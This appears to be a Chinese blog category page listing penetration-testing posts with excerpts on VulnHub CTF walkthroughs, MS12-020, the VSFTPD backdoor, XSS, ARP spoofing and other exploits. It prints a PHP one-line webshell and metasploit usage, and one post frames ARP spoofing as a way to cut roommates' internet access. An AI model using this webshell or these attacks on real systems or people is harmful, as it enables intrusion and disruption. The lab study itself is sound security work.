渗透测试
文章平均质量分 77
_AaRong_
这个人很懒,什么都没有说
展开
-
VULNHUB靶机渗透——DC-3(JoomlaCMS漏洞和Ubuntu16.04本地提权漏洞)
网络拓扑:攻击机kali和靶机dc-3同在NAT模式下信息收集:arp-scan和nmap扫描:arp-scan -lnmap -T4 -A -v -p 1-65535 192.168.65.137靶机开了80端口,待会浏览器访问扫描出了Joomla好像是一个网络模板,百度搜一下看看:猜对了,这就是一个网络模板浏览器访问:作者提示这次只有一个flag,要提权到root才能看到,并且没有任何提示。dirsearch扫描网站路径:dirsearch -u http://192.1原创 2021-12-31 16:57:11 · 2256 阅读 · 0 评论 -
VULNHUB靶机渗透——DC-2(rbash限制shell绕过和git命令提权)
网络拓扑:攻击机KALI和靶机DC-2同在NAT模式下信息收集:arp-scan扫描出靶机IP:arp-scan -l得到靶机IP:192.168.65.136nmap进行端口服务扫描:nmap -T4 -A -p 1-65535 192.168.65.136靶机开放了http服务端口80,接下来可以浏览器中访问它。还开放了ssh远程登陆服务端口7744浏览器访问之前要注意,先在hosts文件(/etc/hosts)中给IP做出解析,要不然一直访问不了这个网站:dirsearch进行网原创 2021-12-29 21:34:59 · 2903 阅读 · 1 评论 -
VULNHUB靶机渗透——DC-6(Activity monitor远程命令执行漏洞利用)
靶机来源:https://www.vulnhub.com/entry/dc-6,315/1.扫描(arp-scan和nmap)可以看到靶机开放了两个端口分别是22和802.打开浏览器浏览靶机网页发现打不开这个网站,分析原因发现URL上并没有显示刚刚输入的靶机IP,而是变成了wordy,那么有可能是本地hosts文件没有解析到这个IP。所以打开hosts文件绑定靶机IP:路径为/etc/hosts修改为:靶机IP wordy再次打开浏览器访问就可以访问成功了:发现这个网页使用的是非原创 2021-12-28 21:05:21 · 3274 阅读 · 1 评论 -
VULNHUB靶机渗透——hackable2
前言可能很多人在进行靶机渗透的时候会出现扫描不出靶机IP的情况,这里是靶机的网络配置没有设置好,设定跟你的虚拟网卡一致就可以了,具体参考这篇文章和这篇文章。渗透过程网络拓扑:攻击机和靶机同是NAT模式(1)arp-scan -l扫描本地主机IP这里根据MAC地址的不同判断出192.168.65.133为靶机IP地址(2)Nmap扫描nmap -A -T4 -p 1-65535 192.168.65.133这里发现靶机开放了21 22 80三个端口,而且21端口是允许匿名登录的,等会直接原创 2021-12-20 16:26:13 · 2044 阅读 · 0 评论 -
VULNHUB靶机渗透--DC-1(drupal)
1. nmap扫描nmap -A 192.168.65.131发现开启了22、80、111端口2. 浏览器打开靶机开启的网站服务发现是一个网站登陆界面3. whatweb扫描出网站模板信息网站模板是drupal,版本信息是drupal 74. 针对这个版本搜索渗透模块searchsploit drupal 7运用这个渗透模块:Drupal 7.0 < 7.31 - ‘Drupalgeddon’ SQL Injection (Add Admin User)cat /us原创 2021-12-16 16:15:33 · 966 阅读 · 0 评论 -
VULNHUB靶机渗透——ZICO2:1
本渗透测试中使用的工具有Arp-scan(获取IP)、Nmap(获取目标开放端口和服务信息)、Dirb(网站目录爆破工具)、Zap(漏洞扫描工具)、在线密文破解工具等等。\1) arp-scan扫描NAT模式下,arp-scan扫描出靶机的IP:192.168.65.134\2) Nmap扫描获取开放端口及服务的全部信息浏览器打开开启的网站界面如下,是一个网络购物平台的网站。\3) Dirb爆破命令:dirb http://192.168.65.134爆破结果发现类似于数原创 2021-12-15 23:30:35 · 1059 阅读 · 0 评论 -
wevedeveloper靶机渗透
1、 发现目标 (netdiscover),找到WebDeveloper的IP地址。2、 利用NMAP扫描目标主机,发现目标主机端口开放、服务情况。nmap -Pn 192.168.65.1/24 #查看同网段所有主机对应开放端口和服务从中判断出靶机的IP以及对应的端口和服务情况。开放了 22端口(SSH远程登录服务)、80端口(HTTP服务)nmap -sV 192.168.65.130 #扫描靶机具体服务信息、服务版本信息3、 若目标主机提供了HTTP服务,尝试利用浏览器原创 2021-12-15 11:44:02 · 2868 阅读 · 0 评论 -
kon-boot绕过window身份验证
1. kon-boot是什么?Kon-Boot是市面上唯一一款可以绕过输入密码便可登录Windows以及macOS操作系统的软件。换句话说,利用Kon-Boot软件即使你不知道密码也依然可以登录设备。2. 工作原理KON-Boot是一款专门针对Windows、Linux、MAC登陆密码破解工具,他能绕过系统所设有的登陆密码,让你的登陆畅通无阻。KON-Boot的原理是在于处理BIOS修改系统内核的引导处理,跳过SAM的检查,直接登陆系统。与PE盘最大的区别就在于,kon-boot不会修改密码也能登原创 2021-12-10 08:27:01 · 1196 阅读 · 0 评论 -
MS12-020蓝屏攻击
攻击机:KALI靶机:win2003server过程:KALI进行Nmap扫描win2003server端口服务以及开放情况nmap -sV 192.168.133.130nmap -Pn 192.168.133.130发现win2003server上已经开启了远程桌面服务,随后进行下一步kali打开metasploit,搜索漏洞模块search ms12-020use auxiliary/dos/windows/rdp/ms12_020_maxchannelidsinfo原创 2021-11-30 13:49:55 · 2277 阅读 · 0 评论 -
一句话木马
简述写一个php脚本,实现简单的反向连接操作。 网络环境:NAT模式下的Kali、win2003server操作过程写好php代码保存至kali的网站目录/var/www/html,命名为shell.php<?php system($_REQUEST['cmd']);?>开启apache服务service apache2 start在win2003...原创 2021-11-26 23:49:09 · 394 阅读 · 0 评论 -
网络渗透测试实验二
实验二 网络嗅探与身份认证实验目的:1、通过使用Wireshark软件掌握Sniffer(嗅探器)工具的使用方法,实现捕捉HTTP等协议的数据包,以理解TCP/IP协议中多种协议的数据结构、通过实验了解HTTP等协议明文传输的特性。2、研究交换环境下的网络嗅探实现及防范方法,研究并利用ARP协议的安全漏洞,通过Arpspoof实现ARP欺骗以捕获内网其他用户数据。3、能利用BrupSuite实现网站登录暴力破解获得登录密码。4、能实现ZIP密码破解,理解安全密码的概念和设置。系统环境:Kali原创 2021-10-10 22:39:10 · 568 阅读 · 2 评论 -
跨站脚本攻击XSS (cross site scripting)--一个小实验
进行一个xss跨站脚本攻击,获取目标的IP和Cookie信息。原创 2021-11-23 10:58:55 · 2517 阅读 · 0 评论 -
DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改 漏洞复现(包括环境搭建)
目录一、漏洞概述二、环境搭建三、漏洞复现一、漏洞概述1 简介织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。2 漏洞限制 1、 只影响前台账户 2、 只能修改未原创 2021-11-22 12:29:41 · 3394 阅读 · 0 评论 -
OWASP TOP 10
OWASP 前 10 名是针对开发人员和 Web 应用程序安全的标准意识文档。它代表了对 Web 应用程序最关键的安全风险的广泛共识。全球被开发人员视为迈向更安全编码的第一步。公司应采用此文档,并启动确保其 Web 应用程序将这些风险降至最低的过程。使用 OWASP Top 10 也许是将组织内的软件开发文化转变为产生更安全代码的最有效的第一步。十大网络应用安全风险有三个新类别,四个类别的命名和范围的变化,和一些巩固在前10名2021年。映射A01:2021-断断续续的门禁从第五位上翻译 2021-11-15 13:16:23 · 98 阅读 · 0 评论 -
Easy File Sharing Server7.2漏洞复现
easy file sharing server7.2漏洞复现漏洞简述easy file sharing server缓冲区漏洞实验环境攻击机:kali linux靶机:windows(这里我使用的靶机是winsever2003)配置在同一网络环境下(同网段)复现过程(1)首先在靶机中安装easy file sharing server软件(2)因为靶机有IIS可以占用了80端口,所以在这里设置一下服务部署的端口为8000,点击Restart:(3)打开网站查看是否修改成功(4)原创 2021-11-04 01:23:04 · 1554 阅读 · 1 评论 -
笑脸漏洞(VSFTPD2.3.4)复现
笑脸漏洞(VSFTPD2.3.4)复现漏洞服务:VSFTPD 2.3.4,俗称笑脸漏洞。存在于这个2.3.4版本,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。攻击机:kali linux靶机:Metasploitable2复现过程Nmap扫描同网断的靶机,观察靶机上的服务开放情况:nmap 192.168.43.0/24发现靶机开放了21端口(Ftp协议),Nmap扫描出FTP服务的版本信息,扫描结果显示ftp服务版本为VSFTPD 2.3.4原创 2021-11-01 23:19:14 · 7768 阅读 · 0 评论 -
被动扫描(工具使用)
1. 简述被动扫描被动扫描主要指的是在目标无法察觉的情况下进行的信息收集。主要通过搜索引擎、自动化工具进行扫描,比较有名的工具和引擎有Maltego、Recon-NG、ZoomEye(钟馗之眼)。主动扫描主动扫描是针对特定目标而发起的扫描,主要通过发送特定的数据包并根据目标的反应获取一些信息。比如:判断目标主机是否存活、获取目标的操作系统信息、目标的指定端口是否开放、以及目标主机上存在的漏洞等等。2.Maltego的使用(1)在kali linux中打开并注册: (2)点击左上角的加号创建原创 2021-10-26 10:54:00 · 2626 阅读 · 0 评论 -
KALI-LINUX桥接模式下网络配置(学习笔记)
简述KALI的网络配置曾经让我心态炸了,想要完成实验就要连接上物理机,网络必须得连通。在踩了很多坑之后,终于配置好了桥接模式的KALI,下面就来看看是如何配置的吧。一、VM的基础设置。首先打开VMware Workstation的虚拟网络编辑器,看看有没有VMnet0网卡(如果没有先点击左下角的还原默认设置,就是重新卸载组件再安装一遍),然后勾选桥接模式,已桥接至这一栏要选择你的WLAN网卡(可通过网络设配器查看),选择好以后,先点应用,再点确定。查看WLAN网卡类型:...原创 2021-10-24 22:27:00 · 11495 阅读 · 12 评论 -
网络渗透测试实验四
实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTPweb服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。系统环境:Kali Linux 2、WebDeveloper靶机来源:https://www.vulnhub.com/实验工具:基本渗透工具实验原理:1、什么是CTFCTF(Capture TheFlag)中文一般译作夺原创 2021-10-19 00:14:58 · 386 阅读 · 0 评论 -
简单的ARP欺骗断网
前言:舍友打游戏、放抖音太吵了?是时候给他们点教训了,让他们感受到什么叫原始生活。(滑稽)实施一个简单的ARP欺骗,实现断网操作。Arp欺骗:Arpspoof安装:在kali终端输入:apt-get install dsniff ssldump特殊情况--kali更好镜像源:vim /etc/apt/sources.list进入vim编辑模式,复制下列的镜像源# deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-原创 2021-10-17 00:35:22 · 962 阅读 · 0 评论 -
wireshark应用和数据包简析
一、抓取网站的数据包二、抓取QQ的数据(oicq)三、Ping和ICMP原创 2021-10-12 22:54:40 · 1722 阅读 · 0 评论 -
网络渗透测试实验三
目录实验三 XSS和SQL注入一、实验目的:二、系统环境:三、网络环境:四、实验工具:五、实验步骤:实验环境搭建。(IIS搭建网站)SQL注入六、心得体会:实验三 XSS和SQL注入一、实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。二、系统环境:Kali Linux 2、Windows Server三、网络环境:交换网络结构四、实验原创 2021-10-11 22:38:28 · 678 阅读 · 0 评论 -
图片寻址——信息收集
目录具体步骤网络收集信息分析小结根据以下图片找到该店的相关信息(地理位置、点名、店面图片、以及相关顾客评论信息等等): 具体步骤 根据以上图片可以明显地观察到这是一家麦当劳的店面:根据汉堡上的文字猜测大概这家店处于东南亚:旋转图片,在报纸上看到马来西亚()的英文单词,就证实了上面的猜测:又发现了这家店的一部分名称:erbang Alaf Restaurant以上图片基本信息已分析...原创 2021-10-08 23:01:33 · 278 阅读 · 0 评论 -
网络渗透测试实验一
实验目的:理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。系统环境:Kali Linux 2、Windows网络环境:交换网络结构实验工具: Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);WinHex、数据恢复软件等实验步骤:1-5题为被动扫描,利用搜索引擎或相关网站1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network securi原创 2021-10-04 21:16:57 · 892 阅读 · 0 评论